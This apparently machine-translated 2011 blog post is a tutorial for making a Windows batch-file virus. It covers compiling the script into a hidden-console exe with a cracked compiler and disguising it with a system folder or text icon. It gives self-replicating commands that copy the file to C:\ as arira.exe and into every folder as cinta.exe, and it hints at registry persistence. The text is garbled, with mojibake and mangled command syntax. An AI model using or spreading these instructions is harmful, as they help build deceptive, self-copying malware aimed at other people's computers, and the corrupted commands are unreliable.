Jumat, 30 September 2011

Make virus with CMD


Sorry yah if there are posting wrong place...
for people who can don't know language programming, we have a solution...

Needful this :

1. Software Quick Batch File Compiler (quickbfc.exe)
2. License key or crack dari quickbfc
3. Knowledge about cmd
4. Software Icon Changer

quickbfc is a software from www.abyssmedia.com which this software can use for mengcompile command cmd as file exe.
one of its merits is its ability to make exe files that are created when the run will not display the console window. This feature can be set by selecting Project => option => ghost application. It's just who can use this feature only full version (or it could be on crack) Icon Changer (IC) is required to look for icons like the icon belongs to the windows. ICs can be downloaded at http://www.shelllabs.com. After opening the IC, the search icon in the folder windows \ system32, there will be many interesting icons, such as a folder icon, icon text, etc.. After the meet desideratum icon save icon. 

Now we discuss the problem cmdnya command. One characteristic of viruses is the ability to multiply. As we know if we make the bat file contents â € œ dg copy% 0 c: \ â € œ it will result in a bat file before dicopikan to c: \. But when we use the same command in quickbfc then the result is not like that, in the sense of that exe file which is generated when the run will not be on the copies to drive c: \. To get around this we can use another way is by the command â € œfor%% a in (*. exe) do if%% ~ za EQU 12 345 copy%% ac: \ arira.exe â € œ.
This command means â € œ for every exe file in this directory if the file size is 12,345 bytes copikan file (12,345 bytes last-sized) to c: \ dg arira.exe name â € œ. 12 345 is the file size of the compiled results quickbfc virus (for example). Imaginable problem is if there is an exe file size is the same and who are in the same folder with our virus file.
Ok, then make other orders.We make the virus so that if we are in the run will open up my documents. The command â € œ explorer% userprofile% â € œ.Terusss, this command can be a bit annoying for / R c: \%% d in (cinta.exe) do copy c: \ arira.exe "%% d", this command means â € œuntuk each folder, subfolders in the drive c copikan file c: \ arira.exe in your folder with the name cinta.exeâ €??. then after the completion of this command is executed all the folders and subfolders in c: \ will have a file cinta.exe.And seterusnyaâ € |. And so think of themselves perintahnyaâ € | .. suppose to make the value in regedit let the virus can live again after the computer restarts, etc..
Example: cmd command that we have made
REM This is the beginning of the scriptfor%% a in (*. exe) do if%% ~ za EQU 12 345 copies of â € œ%% aa €?? c: \ arira.exe% userprofile% explorerfor / R c: \%% d in (cinta.exe) do copy c: \ arira.exe "%% d"REM This is the end of the script
Before you select a custom compiled resources to set the icon of the file to be generated. Compile scripts above, then see the resulting exe file size. Suppose the resulting file size is 82,571, then replace the scripts above that it becomes
REM This is the beginning of the scriptfor%% a in (*. exe) do if%% ~ za EQU 82 571 copies of â € œ%% aa €?? c: \ arira.exe% userprofile% explorerfor / R c: \%% d in (cinta.exe) do copy c: \ arira.exe "%% d"REM This is the end of the script
Compile again, see the resulting file size. If size is 82,571 bytes then it is correct. If not, repeat until the number at the same scripts with the resulting file size.

Description:In the example above the command â € œfor%% a in (*. exe) do if%% ~ za EQU 82 571 copy%% ac: \ arira.exe â € œ can not be used for cmd (only for scripts), if pingin use this command in cmd to eat instead of%% a with% a, so the command would be â € œ for% a in (*. exe) do if% ~ za EQU 82 571 copy% ac: \ arira.exe â € œ

0 komentar:

Posting Komentar

 
Design by Adnan Themes | Bloggerized by Adnan Lutfi - Premium Blogger Themes | Best Themes